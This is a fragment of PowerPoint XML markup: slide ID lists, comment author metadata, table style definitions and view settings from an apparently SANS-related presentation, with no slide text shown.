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999" r:id="rId5"/>
  </p:sldMasterIdLst>
  <p:notesMasterIdLst>
    <p:notesMasterId r:id="rId54"/>
  </p:notesMasterIdLst>
  <p:handoutMasterIdLst>
    <p:handoutMasterId r:id="rId55"/>
  </p:handoutMasterIdLst>
  <p:sldIdLst>
    <p:sldId id="281" r:id="rId6"/>
    <p:sldId id="283" r:id="rId7"/>
    <p:sldId id="475" r:id="rId8"/>
    <p:sldId id="487" r:id="rId9"/>
    <p:sldId id="477" r:id="rId10"/>
    <p:sldId id="478" r:id="rId11"/>
    <p:sldId id="479" r:id="rId12"/>
    <p:sldId id="480" r:id="rId13"/>
    <p:sldId id="481" r:id="rId14"/>
    <p:sldId id="452" r:id="rId15"/>
    <p:sldId id="451" r:id="rId16"/>
    <p:sldId id="453" r:id="rId17"/>
    <p:sldId id="454" r:id="rId18"/>
    <p:sldId id="493" r:id="rId19"/>
    <p:sldId id="494" r:id="rId20"/>
    <p:sldId id="490" r:id="rId21"/>
    <p:sldId id="488" r:id="rId22"/>
    <p:sldId id="482" r:id="rId23"/>
    <p:sldId id="483" r:id="rId24"/>
    <p:sldId id="484" r:id="rId25"/>
    <p:sldId id="485" r:id="rId26"/>
    <p:sldId id="486" r:id="rId27"/>
    <p:sldId id="495" r:id="rId28"/>
    <p:sldId id="333" r:id="rId29"/>
    <p:sldId id="335" r:id="rId30"/>
    <p:sldId id="342" r:id="rId31"/>
    <p:sldId id="343" r:id="rId32"/>
    <p:sldId id="491" r:id="rId33"/>
    <p:sldId id="389" r:id="rId34"/>
    <p:sldId id="390" r:id="rId35"/>
    <p:sldId id="391" r:id="rId36"/>
    <p:sldId id="345" r:id="rId37"/>
    <p:sldId id="392" r:id="rId38"/>
    <p:sldId id="393" r:id="rId39"/>
    <p:sldId id="395" r:id="rId40"/>
    <p:sldId id="348" r:id="rId41"/>
    <p:sldId id="349" r:id="rId42"/>
    <p:sldId id="350" r:id="rId43"/>
    <p:sldId id="351" r:id="rId44"/>
    <p:sldId id="352" r:id="rId45"/>
    <p:sldId id="353" r:id="rId46"/>
    <p:sldId id="354" r:id="rId47"/>
    <p:sldId id="355" r:id="rId48"/>
    <p:sldId id="356" r:id="rId49"/>
    <p:sldId id="358" r:id="rId50"/>
    <p:sldId id="492" r:id="rId51"/>
    <p:sldId id="496" r:id="rId52"/>
    <p:sldId id="324" r:id="rId53"/>
  </p:sldIdLst>
  <p:sldSz cx="12192000" cy="6858000"/>
  <p:notesSz cx="7315200" cy="9601200"/>
  <p:defaultText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EBA682-CD36-8F1B-D93C-438328EA1281}" name="Dave Mayer" initials="DM" userId="S::Dave@neuvik.com::21976424-2d13-4dd5-9506-81b6ca5dff11" providerId="AD"/>
  <p188:author id="{A1F19CC2-39C6-E591-797E-96A97E5DE442}" name="Hertan, Karen" initials="KH" userId="S::khertan@sans.org::9c6f197d-3e32-4bfe-b784-1f4543ac4c3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ermione Osmers" initials="HO" lastIdx="2" clrIdx="0">
    <p:extLst>
      <p:ext uri="{19B8F6BF-5375-455C-9EA6-DF929625EA0E}">
        <p15:presenceInfo xmlns:p15="http://schemas.microsoft.com/office/powerpoint/2012/main" userId="S::hermione@stinsondesign.com::58590dc8-7723-4708-b2c4-5c46b0b1c2d8" providerId="AD"/>
      </p:ext>
    </p:extLst>
  </p:cmAuthor>
  <p:cmAuthor id="2" name="Mikayla Bruder" initials="MB" lastIdx="1" clrIdx="1">
    <p:extLst>
      <p:ext uri="{19B8F6BF-5375-455C-9EA6-DF929625EA0E}">
        <p15:presenceInfo xmlns:p15="http://schemas.microsoft.com/office/powerpoint/2012/main" userId="S::mikayla@stinson.co::330b840f-adb8-4c4d-a371-fab3a25d24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E1E1"/>
    <a:srgbClr val="F1EFEF"/>
    <a:srgbClr val="F7F7F7"/>
    <a:srgbClr val="E06B0A"/>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19A026-89B5-4372-AB0C-222172E514A3}" styleName="Clean Style - Dark">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dk2"/>
          </a:solidFill>
        </a:fill>
      </a:tcStyle>
    </a:firstRow>
  </a:tblStyle>
  <a:tblStyle styleId="{677C0241-BB8B-47E3-AEDE-C25888606C7D}" styleName="Clean Style - Accent 1">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1"/>
          </a:solidFill>
        </a:fill>
      </a:tcStyle>
    </a:firstRow>
  </a:tblStyle>
  <a:tblStyle styleId="{157B1B87-AC8B-4589-88FA-2C9E7A898293}" styleName="Clean Style - Accent 2">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2"/>
          </a:solidFill>
        </a:fill>
      </a:tcStyle>
    </a:firstRow>
  </a:tblStyle>
  <a:tblStyle styleId="{DC0F2F98-B3F6-41E5-AB50-7EB95E07AED7}" styleName="Clean Style - Accent 3">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3"/>
          </a:solidFill>
        </a:fill>
      </a:tcStyle>
    </a:firstRow>
  </a:tblStyle>
  <a:tblStyle styleId="{83F34F53-8FAF-4B82-B27B-ACD8CBDB9D37}" styleName="Clean Style - Accent 4">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4"/>
          </a:solidFill>
        </a:fill>
      </a:tcStyle>
    </a:firstRow>
  </a:tblStyle>
  <a:tblStyle styleId="{2F8ADD68-7D3B-4FCE-B35A-E369A1045D04}" styleName="Clean Style - Accent 5">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5"/>
          </a:solidFill>
        </a:fill>
      </a:tcStyle>
    </a:firstRow>
  </a:tblStyle>
  <a:tblStyle styleId="{E157B2C9-203B-4698-B823-4837414C79EF}" styleName="Clean Style - Accent 6">
    <a:wholeTbl>
      <a:tcTxStyle>
        <a:fontRef idx="minor"/>
        <a:schemeClr val="dk1">
          <a:tint val="90000"/>
        </a:schemeClr>
      </a:tcTxStyle>
      <a:tcStyle>
        <a:tcBdr>
          <a:left>
            <a:ln w="2000" cmpd="sng">
              <a:solidFill>
                <a:schemeClr val="lt1"/>
              </a:solidFill>
            </a:ln>
          </a:left>
          <a:right>
            <a:ln w="2000" cmpd="sng">
              <a:solidFill>
                <a:schemeClr val="lt1"/>
              </a:solidFill>
            </a:ln>
          </a:right>
          <a:top>
            <a:ln w="12700" cmpd="sng">
              <a:solidFill>
                <a:schemeClr val="dk1">
                  <a:alpha val="20000"/>
                </a:schemeClr>
              </a:solidFill>
            </a:ln>
          </a:top>
          <a:bottom>
            <a:ln w="12700" cmpd="sng">
              <a:solidFill>
                <a:schemeClr val="dk1">
                  <a:alpha val="20000"/>
                </a:schemeClr>
              </a:solidFill>
            </a:ln>
          </a:bottom>
          <a:insideH>
            <a:ln w="12700" cmpd="sng">
              <a:solidFill>
                <a:schemeClr val="dk1">
                  <a:alpha val="20000"/>
                </a:schemeClr>
              </a:solidFill>
            </a:ln>
          </a:insideH>
          <a:insideV>
            <a:ln w="76200" cmpd="sng">
              <a:solidFill>
                <a:schemeClr val="lt1"/>
              </a:solidFill>
            </a:ln>
          </a:insideV>
        </a:tcBdr>
        <a:fill>
          <a:solidFill>
            <a:schemeClr val="lt1">
              <a:shade val="95000"/>
            </a:schemeClr>
          </a:solidFill>
        </a:fill>
      </a:tcStyle>
    </a:wholeTbl>
    <a:band1H>
      <a:tcStyle>
        <a:tcBdr/>
      </a:tcStyle>
    </a:band1H>
    <a:band2H>
      <a:tcStyle>
        <a:tcBdr>
          <a:top>
            <a:ln w="12700" cmpd="sng">
              <a:solidFill>
                <a:schemeClr val="dk1">
                  <a:alpha val="20000"/>
                </a:schemeClr>
              </a:solidFill>
            </a:ln>
          </a:top>
          <a:bottom>
            <a:ln w="12700" cmpd="sng">
              <a:solidFill>
                <a:schemeClr val="dk1">
                  <a:alpha val="20000"/>
                </a:schemeClr>
              </a:solidFill>
            </a:ln>
          </a:bottom>
        </a:tcBdr>
        <a:fill>
          <a:solidFill>
            <a:schemeClr val="lt1">
              <a:shade val="85000"/>
            </a:schemeClr>
          </a:solidFill>
        </a:fill>
      </a:tcStyle>
    </a:band2H>
    <a:band1V>
      <a:tcStyle>
        <a:tcBdr>
          <a:left>
            <a:ln w="0" cmpd="sng">
              <a:solidFill>
                <a:schemeClr val="lt1"/>
              </a:solidFill>
            </a:ln>
          </a:left>
          <a:right>
            <a:ln w="0" cmpd="sng">
              <a:solidFill>
                <a:schemeClr val="lt1"/>
              </a:solidFill>
            </a:ln>
          </a:right>
        </a:tcBdr>
      </a:tcStyle>
    </a:band1V>
    <a:band2V>
      <a:tcStyle>
        <a:tcBdr>
          <a:left>
            <a:ln w="0" cmpd="sng">
              <a:solidFill>
                <a:schemeClr val="lt1"/>
              </a:solidFill>
            </a:ln>
          </a:left>
          <a:right>
            <a:ln w="0" cmpd="sng">
              <a:solidFill>
                <a:schemeClr val="lt1"/>
              </a:solidFill>
            </a:ln>
          </a:right>
        </a:tcBdr>
      </a:tcStyle>
    </a:band2V>
    <a:lastCol>
      <a:tcTxStyle b="on">
        <a:fontRef idx="minor"/>
        <a:schemeClr val="dk1">
          <a:tint val="95000"/>
        </a:schemeClr>
      </a:tcTxStyle>
      <a:tcStyle>
        <a:tcBdr/>
      </a:tcStyle>
    </a:lastCol>
    <a:firstCol>
      <a:tcTxStyle b="on">
        <a:fontRef idx="minor"/>
        <a:schemeClr val="dk1">
          <a:tint val="95000"/>
        </a:schemeClr>
      </a:tcTxStyle>
      <a:tcStyle>
        <a:tcBdr/>
      </a:tcStyle>
    </a:firstCol>
    <a:lastRow>
      <a:tcTxStyle b="on">
        <a:fontRef idx="minor"/>
        <a:schemeClr val="dk1">
          <a:tint val="95000"/>
        </a:schemeClr>
      </a:tcTxStyle>
      <a:tcStyle>
        <a:tcBdr>
          <a:top>
            <a:ln w="19050" cmpd="sng">
              <a:solidFill>
                <a:schemeClr val="dk1">
                  <a:alpha val="90000"/>
                </a:schemeClr>
              </a:solidFill>
            </a:ln>
          </a:top>
          <a:bottom>
            <a:ln w="2000" cmpd="sng">
              <a:solidFill>
                <a:schemeClr val="lt1"/>
              </a:solidFill>
            </a:ln>
          </a:bottom>
        </a:tcBdr>
        <a:fill>
          <a:solidFill>
            <a:schemeClr val="lt1">
              <a:shade val="65000"/>
            </a:schemeClr>
          </a:solidFill>
        </a:fill>
      </a:tcStyle>
    </a:lastRow>
    <a:firstRow>
      <a:tcTxStyle b="on">
        <a:fontRef idx="minor"/>
        <a:schemeClr val="lt1"/>
      </a:tcTxStyle>
      <a:tcStyle>
        <a:tcBdr>
          <a:top>
            <a:ln w="2000" cmpd="sng">
              <a:solidFill>
                <a:schemeClr val="lt1"/>
              </a:solidFill>
            </a:ln>
          </a:top>
          <a:bottom>
            <a:ln w="19050" cmpd="sng">
              <a:solidFill>
                <a:schemeClr val="dk1">
                  <a:alpha val="90000"/>
                </a:schemeClr>
              </a:solidFill>
            </a:ln>
          </a:bottom>
        </a:tcBdr>
        <a:fill>
          <a:solidFill>
            <a:schemeClr val="accent6"/>
          </a:solidFill>
        </a:fill>
      </a:tcStyle>
    </a:firstRow>
  </a:tblStyle>
  <a:tblStyle styleId="{15D3CCF1-E793-4026-81F1-51624D72E4B9}" styleName="Fresh Style - Dark">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dk2"/>
              </a:solidFill>
            </a:ln>
          </a:top>
          <a:bottom>
            <a:ln w="38100" cmpd="sng">
              <a:solidFill>
                <a:schemeClr val="dk2"/>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dk2">
          <a:shade val="80000"/>
        </a:schemeClr>
      </a:tcTxStyle>
      <a:tcStyle>
        <a:tcBdr/>
      </a:tcStyle>
    </a:lastCol>
    <a:firstCol>
      <a:tcTxStyle b="on">
        <a:fontRef idx="minor"/>
        <a:schemeClr val="dk2">
          <a:shade val="80000"/>
        </a:schemeClr>
      </a:tcTxStyle>
      <a:tcStyle>
        <a:tcBdr/>
      </a:tcStyle>
    </a:firstCol>
    <a:lastRow>
      <a:tcTxStyle b="on">
        <a:fontRef idx="minor"/>
        <a:schemeClr val="dk2">
          <a:shade val="70000"/>
        </a:schemeClr>
      </a:tcTxStyle>
      <a:tcStyle>
        <a:tcBdr>
          <a:top>
            <a:ln w="38100" cmpd="sng">
              <a:solidFill>
                <a:schemeClr val="dk2"/>
              </a:solidFill>
            </a:ln>
          </a:top>
          <a:bottom>
            <a:ln w="0" cmpd="sng">
              <a:solidFill>
                <a:schemeClr val="lt1"/>
              </a:solidFill>
            </a:ln>
          </a:bottom>
        </a:tcBdr>
        <a:fill>
          <a:solidFill>
            <a:schemeClr val="dk2">
              <a:tint val="35000"/>
            </a:schemeClr>
          </a:solidFill>
        </a:fill>
      </a:tcStyle>
    </a:lastRow>
    <a:firstRow>
      <a:tcTxStyle b="on">
        <a:fontRef idx="minor"/>
        <a:schemeClr val="lt1"/>
      </a:tcTxStyle>
      <a:tcStyle>
        <a:tcBdr>
          <a:bottom>
            <a:ln w="38100" cmpd="sng">
              <a:solidFill>
                <a:schemeClr val="dk2"/>
              </a:solidFill>
            </a:ln>
          </a:bottom>
        </a:tcBdr>
        <a:fill>
          <a:solidFill>
            <a:schemeClr val="dk2"/>
          </a:solidFill>
        </a:fill>
      </a:tcStyle>
    </a:firstRow>
  </a:tblStyle>
  <a:tblStyle styleId="{6C1BF337-7541-4355-B6DB-82CFFEAD1462}" styleName="Fresh Style - Accent 1">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1"/>
              </a:solidFill>
            </a:ln>
          </a:top>
          <a:bottom>
            <a:ln w="38100" cmpd="sng">
              <a:solidFill>
                <a:schemeClr val="accent1"/>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1">
          <a:shade val="80000"/>
        </a:schemeClr>
      </a:tcTxStyle>
      <a:tcStyle>
        <a:tcBdr/>
      </a:tcStyle>
    </a:lastCol>
    <a:firstCol>
      <a:tcTxStyle b="on">
        <a:fontRef idx="minor"/>
        <a:schemeClr val="accent1">
          <a:shade val="80000"/>
        </a:schemeClr>
      </a:tcTxStyle>
      <a:tcStyle>
        <a:tcBdr/>
      </a:tcStyle>
    </a:firstCol>
    <a:lastRow>
      <a:tcTxStyle b="on">
        <a:fontRef idx="minor"/>
        <a:schemeClr val="accent1">
          <a:shade val="70000"/>
        </a:schemeClr>
      </a:tcTxStyle>
      <a:tcStyle>
        <a:tcBdr>
          <a:top>
            <a:ln w="38100" cmpd="sng">
              <a:solidFill>
                <a:schemeClr val="accent1"/>
              </a:solidFill>
            </a:ln>
          </a:top>
          <a:bottom>
            <a:ln w="0" cmpd="sng">
              <a:solidFill>
                <a:schemeClr val="lt1"/>
              </a:solidFill>
            </a:ln>
          </a:bottom>
        </a:tcBdr>
        <a:fill>
          <a:solidFill>
            <a:schemeClr val="accent1">
              <a:tint val="35000"/>
            </a:schemeClr>
          </a:solidFill>
        </a:fill>
      </a:tcStyle>
    </a:lastRow>
    <a:firstRow>
      <a:tcTxStyle b="on">
        <a:fontRef idx="minor"/>
        <a:schemeClr val="lt1"/>
      </a:tcTxStyle>
      <a:tcStyle>
        <a:tcBdr>
          <a:bottom>
            <a:ln w="38100" cmpd="sng">
              <a:solidFill>
                <a:schemeClr val="accent1"/>
              </a:solidFill>
            </a:ln>
          </a:bottom>
        </a:tcBdr>
        <a:fill>
          <a:solidFill>
            <a:schemeClr val="accent1"/>
          </a:solidFill>
        </a:fill>
      </a:tcStyle>
    </a:firstRow>
  </a:tblStyle>
  <a:tblStyle styleId="{E6A9ADA2-622F-4727-95B6-F9E95A9E867F}" styleName="Fresh Style - Accent 2">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2"/>
              </a:solidFill>
            </a:ln>
          </a:top>
          <a:bottom>
            <a:ln w="38100" cmpd="sng">
              <a:solidFill>
                <a:schemeClr val="accent2"/>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2">
          <a:shade val="80000"/>
        </a:schemeClr>
      </a:tcTxStyle>
      <a:tcStyle>
        <a:tcBdr/>
      </a:tcStyle>
    </a:lastCol>
    <a:firstCol>
      <a:tcTxStyle b="on">
        <a:fontRef idx="minor"/>
        <a:schemeClr val="accent2">
          <a:shade val="80000"/>
        </a:schemeClr>
      </a:tcTxStyle>
      <a:tcStyle>
        <a:tcBdr/>
      </a:tcStyle>
    </a:firstCol>
    <a:lastRow>
      <a:tcTxStyle b="on">
        <a:fontRef idx="minor"/>
        <a:schemeClr val="accent2">
          <a:shade val="70000"/>
        </a:schemeClr>
      </a:tcTxStyle>
      <a:tcStyle>
        <a:tcBdr>
          <a:top>
            <a:ln w="38100" cmpd="sng">
              <a:solidFill>
                <a:schemeClr val="accent2"/>
              </a:solidFill>
            </a:ln>
          </a:top>
          <a:bottom>
            <a:ln w="0" cmpd="sng">
              <a:solidFill>
                <a:schemeClr val="lt1"/>
              </a:solidFill>
            </a:ln>
          </a:bottom>
        </a:tcBdr>
        <a:fill>
          <a:solidFill>
            <a:schemeClr val="accent2">
              <a:tint val="35000"/>
            </a:schemeClr>
          </a:solidFill>
        </a:fill>
      </a:tcStyle>
    </a:lastRow>
    <a:firstRow>
      <a:tcTxStyle b="on">
        <a:fontRef idx="minor"/>
        <a:schemeClr val="lt1"/>
      </a:tcTxStyle>
      <a:tcStyle>
        <a:tcBdr>
          <a:bottom>
            <a:ln w="38100" cmpd="sng">
              <a:solidFill>
                <a:schemeClr val="accent2"/>
              </a:solidFill>
            </a:ln>
          </a:bottom>
        </a:tcBdr>
        <a:fill>
          <a:solidFill>
            <a:schemeClr val="accent2"/>
          </a:solidFill>
        </a:fill>
      </a:tcStyle>
    </a:firstRow>
  </a:tblStyle>
  <a:tblStyle styleId="{AF095B28-85C3-431A-9D4A-D9412A1D5A94}" styleName="Fresh Style - Accent 3">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3"/>
              </a:solidFill>
            </a:ln>
          </a:top>
          <a:bottom>
            <a:ln w="38100" cmpd="sng">
              <a:solidFill>
                <a:schemeClr val="accent3"/>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3">
          <a:shade val="80000"/>
        </a:schemeClr>
      </a:tcTxStyle>
      <a:tcStyle>
        <a:tcBdr/>
      </a:tcStyle>
    </a:lastCol>
    <a:firstCol>
      <a:tcTxStyle b="on">
        <a:fontRef idx="minor"/>
        <a:schemeClr val="accent3">
          <a:shade val="80000"/>
        </a:schemeClr>
      </a:tcTxStyle>
      <a:tcStyle>
        <a:tcBdr/>
      </a:tcStyle>
    </a:firstCol>
    <a:lastRow>
      <a:tcTxStyle b="on">
        <a:fontRef idx="minor"/>
        <a:schemeClr val="accent3">
          <a:shade val="70000"/>
        </a:schemeClr>
      </a:tcTxStyle>
      <a:tcStyle>
        <a:tcBdr>
          <a:top>
            <a:ln w="38100" cmpd="sng">
              <a:solidFill>
                <a:schemeClr val="accent3"/>
              </a:solidFill>
            </a:ln>
          </a:top>
          <a:bottom>
            <a:ln w="0" cmpd="sng">
              <a:solidFill>
                <a:schemeClr val="lt1"/>
              </a:solidFill>
            </a:ln>
          </a:bottom>
        </a:tcBdr>
        <a:fill>
          <a:solidFill>
            <a:schemeClr val="accent3">
              <a:tint val="35000"/>
            </a:schemeClr>
          </a:solidFill>
        </a:fill>
      </a:tcStyle>
    </a:lastRow>
    <a:firstRow>
      <a:tcTxStyle b="on">
        <a:fontRef idx="minor"/>
        <a:schemeClr val="lt1"/>
      </a:tcTxStyle>
      <a:tcStyle>
        <a:tcBdr>
          <a:bottom>
            <a:ln w="38100" cmpd="sng">
              <a:solidFill>
                <a:schemeClr val="accent3"/>
              </a:solidFill>
            </a:ln>
          </a:bottom>
        </a:tcBdr>
        <a:fill>
          <a:solidFill>
            <a:schemeClr val="accent3"/>
          </a:solidFill>
        </a:fill>
      </a:tcStyle>
    </a:firstRow>
  </a:tblStyle>
  <a:tblStyle styleId="{9C778D48-D5EB-4061-B858-6E3F25531815}" styleName="Fresh Style - Accent 4">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4"/>
              </a:solidFill>
            </a:ln>
          </a:top>
          <a:bottom>
            <a:ln w="38100" cmpd="sng">
              <a:solidFill>
                <a:schemeClr val="accent4"/>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4">
          <a:shade val="80000"/>
        </a:schemeClr>
      </a:tcTxStyle>
      <a:tcStyle>
        <a:tcBdr/>
      </a:tcStyle>
    </a:lastCol>
    <a:firstCol>
      <a:tcTxStyle b="on">
        <a:fontRef idx="minor"/>
        <a:schemeClr val="accent4">
          <a:shade val="80000"/>
        </a:schemeClr>
      </a:tcTxStyle>
      <a:tcStyle>
        <a:tcBdr/>
      </a:tcStyle>
    </a:firstCol>
    <a:lastRow>
      <a:tcTxStyle b="on">
        <a:fontRef idx="minor"/>
        <a:schemeClr val="accent4">
          <a:shade val="70000"/>
        </a:schemeClr>
      </a:tcTxStyle>
      <a:tcStyle>
        <a:tcBdr>
          <a:top>
            <a:ln w="38100" cmpd="sng">
              <a:solidFill>
                <a:schemeClr val="accent4"/>
              </a:solidFill>
            </a:ln>
          </a:top>
          <a:bottom>
            <a:ln w="0" cmpd="sng">
              <a:solidFill>
                <a:schemeClr val="lt1"/>
              </a:solidFill>
            </a:ln>
          </a:bottom>
        </a:tcBdr>
        <a:fill>
          <a:solidFill>
            <a:schemeClr val="accent4">
              <a:tint val="35000"/>
            </a:schemeClr>
          </a:solidFill>
        </a:fill>
      </a:tcStyle>
    </a:lastRow>
    <a:firstRow>
      <a:tcTxStyle b="on">
        <a:fontRef idx="minor"/>
        <a:schemeClr val="lt1"/>
      </a:tcTxStyle>
      <a:tcStyle>
        <a:tcBdr>
          <a:bottom>
            <a:ln w="38100" cmpd="sng">
              <a:solidFill>
                <a:schemeClr val="accent4"/>
              </a:solidFill>
            </a:ln>
          </a:bottom>
        </a:tcBdr>
        <a:fill>
          <a:solidFill>
            <a:schemeClr val="accent4"/>
          </a:solidFill>
        </a:fill>
      </a:tcStyle>
    </a:firstRow>
  </a:tblStyle>
  <a:tblStyle styleId="{A3870154-50FA-4873-A95B-8A7E0684D808}" styleName="Fresh Style - Accent 5">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5"/>
              </a:solidFill>
            </a:ln>
          </a:top>
          <a:bottom>
            <a:ln w="38100" cmpd="sng">
              <a:solidFill>
                <a:schemeClr val="accent5"/>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5">
          <a:shade val="80000"/>
        </a:schemeClr>
      </a:tcTxStyle>
      <a:tcStyle>
        <a:tcBdr/>
      </a:tcStyle>
    </a:lastCol>
    <a:firstCol>
      <a:tcTxStyle b="on">
        <a:fontRef idx="minor"/>
        <a:schemeClr val="accent5">
          <a:shade val="80000"/>
        </a:schemeClr>
      </a:tcTxStyle>
      <a:tcStyle>
        <a:tcBdr/>
      </a:tcStyle>
    </a:firstCol>
    <a:lastRow>
      <a:tcTxStyle b="on">
        <a:fontRef idx="minor"/>
        <a:schemeClr val="accent5">
          <a:shade val="70000"/>
        </a:schemeClr>
      </a:tcTxStyle>
      <a:tcStyle>
        <a:tcBdr>
          <a:top>
            <a:ln w="38100" cmpd="sng">
              <a:solidFill>
                <a:schemeClr val="accent5"/>
              </a:solidFill>
            </a:ln>
          </a:top>
          <a:bottom>
            <a:ln w="0" cmpd="sng">
              <a:solidFill>
                <a:schemeClr val="lt1"/>
              </a:solidFill>
            </a:ln>
          </a:bottom>
        </a:tcBdr>
        <a:fill>
          <a:solidFill>
            <a:schemeClr val="accent5">
              <a:tint val="35000"/>
            </a:schemeClr>
          </a:solidFill>
        </a:fill>
      </a:tcStyle>
    </a:lastRow>
    <a:firstRow>
      <a:tcTxStyle b="on">
        <a:fontRef idx="minor"/>
        <a:schemeClr val="lt1"/>
      </a:tcTxStyle>
      <a:tcStyle>
        <a:tcBdr>
          <a:bottom>
            <a:ln w="38100" cmpd="sng">
              <a:solidFill>
                <a:schemeClr val="accent5"/>
              </a:solidFill>
            </a:ln>
          </a:bottom>
        </a:tcBdr>
        <a:fill>
          <a:solidFill>
            <a:schemeClr val="accent5"/>
          </a:solidFill>
        </a:fill>
      </a:tcStyle>
    </a:firstRow>
  </a:tblStyle>
  <a:tblStyle styleId="{3853E620-792F-4414-8370-5E50A7553A8F}" styleName="Fresh Style - Accent 6">
    <a:wholeTbl>
      <a:tcTxStyle>
        <a:fontRef idx="minor"/>
        <a:schemeClr val="dk1">
          <a:tint val="90000"/>
        </a:schemeClr>
      </a:tcTxStyle>
      <a:tcStyle>
        <a:tcBdr>
          <a:left>
            <a:ln w="2000" cmpd="sng">
              <a:solidFill>
                <a:schemeClr val="lt1"/>
              </a:solidFill>
            </a:ln>
          </a:left>
          <a:right>
            <a:ln w="2000" cmpd="sng">
              <a:solidFill>
                <a:schemeClr val="lt1"/>
              </a:solidFill>
            </a:ln>
          </a:right>
          <a:top>
            <a:ln w="38100" cmpd="sng">
              <a:solidFill>
                <a:schemeClr val="accent6"/>
              </a:solidFill>
            </a:ln>
          </a:top>
          <a:bottom>
            <a:ln w="38100" cmpd="sng">
              <a:solidFill>
                <a:schemeClr val="accent6"/>
              </a:solidFill>
            </a:ln>
          </a:bottom>
          <a:insideH>
            <a:ln w="12700" cmpd="sng">
              <a:solidFill>
                <a:schemeClr val="dk1">
                  <a:alpha val="20000"/>
                </a:schemeClr>
              </a:solidFill>
            </a:ln>
          </a:insideH>
          <a:insideV>
            <a:ln w="0" cmpd="sng">
              <a:solidFill>
                <a:schemeClr val="lt1"/>
              </a:solidFill>
            </a:ln>
          </a:insideV>
        </a:tcBdr>
        <a:fill>
          <a:solidFill>
            <a:schemeClr val="lt1"/>
          </a:solidFill>
        </a:fill>
      </a:tcStyle>
    </a:wholeTbl>
    <a:band1H>
      <a:tcStyle>
        <a:tcBdr/>
      </a:tcStyle>
    </a:band1H>
    <a:band2H>
      <a:tcStyle>
        <a:tcBdr>
          <a:top>
            <a:ln w="0" cmpd="sng">
              <a:solidFill>
                <a:schemeClr val="lt1"/>
              </a:solidFill>
            </a:ln>
          </a:top>
          <a:bottom>
            <a:ln w="0" cmpd="sng">
              <a:solidFill>
                <a:schemeClr val="lt1"/>
              </a:solidFill>
            </a:ln>
          </a:bottom>
        </a:tcBdr>
        <a:fill>
          <a:solidFill>
            <a:schemeClr val="lt1">
              <a:shade val="90000"/>
            </a:schemeClr>
          </a:solidFill>
        </a:fill>
      </a:tcStyle>
    </a:band2H>
    <a:band1V>
      <a:tcStyle>
        <a:tcBdr/>
      </a:tcStyle>
    </a:band1V>
    <a:band2V>
      <a:tcStyle>
        <a:tcBdr/>
      </a:tcStyle>
    </a:band2V>
    <a:lastCol>
      <a:tcTxStyle b="on">
        <a:fontRef idx="minor"/>
        <a:schemeClr val="accent6">
          <a:shade val="80000"/>
        </a:schemeClr>
      </a:tcTxStyle>
      <a:tcStyle>
        <a:tcBdr/>
      </a:tcStyle>
    </a:lastCol>
    <a:firstCol>
      <a:tcTxStyle b="on">
        <a:fontRef idx="minor"/>
        <a:schemeClr val="accent6">
          <a:shade val="80000"/>
        </a:schemeClr>
      </a:tcTxStyle>
      <a:tcStyle>
        <a:tcBdr/>
      </a:tcStyle>
    </a:firstCol>
    <a:lastRow>
      <a:tcTxStyle b="on">
        <a:fontRef idx="minor"/>
        <a:schemeClr val="accent6">
          <a:shade val="70000"/>
        </a:schemeClr>
      </a:tcTxStyle>
      <a:tcStyle>
        <a:tcBdr>
          <a:top>
            <a:ln w="38100" cmpd="sng">
              <a:solidFill>
                <a:schemeClr val="accent6"/>
              </a:solidFill>
            </a:ln>
          </a:top>
          <a:bottom>
            <a:ln w="0" cmpd="sng">
              <a:solidFill>
                <a:schemeClr val="lt1"/>
              </a:solidFill>
            </a:ln>
          </a:bottom>
        </a:tcBdr>
        <a:fill>
          <a:solidFill>
            <a:schemeClr val="accent6">
              <a:tint val="35000"/>
            </a:schemeClr>
          </a:solidFill>
        </a:fill>
      </a:tcStyle>
    </a:lastRow>
    <a:firstRow>
      <a:tcTxStyle b="on">
        <a:fontRef idx="minor"/>
        <a:schemeClr val="lt1"/>
      </a:tcTxStyle>
      <a:tcStyle>
        <a:tcBdr>
          <a:bottom>
            <a:ln w="38100" cmpd="sng">
              <a:solidFill>
                <a:schemeClr val="accent6"/>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3" autoAdjust="0"/>
    <p:restoredTop sz="81663" autoAdjust="0"/>
  </p:normalViewPr>
  <p:slideViewPr>
    <p:cSldViewPr snapToGrid="0">
      <p:cViewPr varScale="1">
        <p:scale>
          <a:sx n="60" d="100"/>
          <a:sy n="60" d="100"/>
        </p:scale>
        <p:origin x="792" y="52"/>
      </p:cViewPr>
      <p:guideLst/>
    </p:cSldViewPr>
  </p:slideViewPr>
  <p:outlineViewPr>
    <p:cViewPr>
      <p:scale>
        <a:sx n="33" d="100"/>
        <a:sy n="33" d="100"/>
      </p:scale>
      <p:origin x="0" y="-115368"/>
    </p:cViewPr>
  </p:outlineViewPr>
  <p:notesTextViewPr>
    <p:cViewPr>
      <p:scale>
        <a:sx n="98" d="100"/>
        <a:sy n="98" d="100"/>
      </p:scale>
      <p:origin x="0" y="0"/>
    </p:cViewPr>
  </p:notesTextViewPr>
  <p:sorterViewPr>
    <p:cViewPr varScale="1">
      <p:scale>
        <a:sx n="100" d="100"/>
        <a:sy n="100" d="100"/>
      </p:scale>
      <p:origin x="0" y="0"/>
    </p:cViewPr>
  </p:sorterViewPr>
  <p:notesViewPr>
    <p:cSldViewPr snapToGrid="0">
      <p:cViewPr varScale="1">
        <p:scale>
          <a:sx n="74" d="100"/>
          <a:sy n="74" d="100"/>
        </p:scale>
        <p:origin x="3162"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51030B-1D51-2A07-E680-EE1910905F3C}"/>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FBA08C2A-B2AA-3FC9-DDEC-F92637EA0D46}"/>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B17599-72FC-402C-AA4C-A5619B215867}" type="datetimeFigureOut">
              <a:rPr lang="en-US" smtClean="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>1/21/2025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7E581BCD-F0DF-EA01-68A6-AD463707A6C1}"/>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AF421DB7-CEFB-99F3-151C-B39A21137FC6}"/>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696BA1FF-F088-4C0D-A542-B3A947BCF9D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8229600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96863" y="332190"/>
            <a:ext cx="6721475" cy="378142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296863" y="4288281"/>
            <a:ext cx="6721475" cy="5059917"/>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186821" y="9196488"/>
            <a:ext cx="941559" cy="303420"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" lIns="96661" tIns="48331" rIns="96661" bIns="48331" rtlCol="0" anchor="b"/>
          <a:lstStyle>
            <a:lvl1pPr algn="ctr">
              <a:defRPr sz="1000"/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
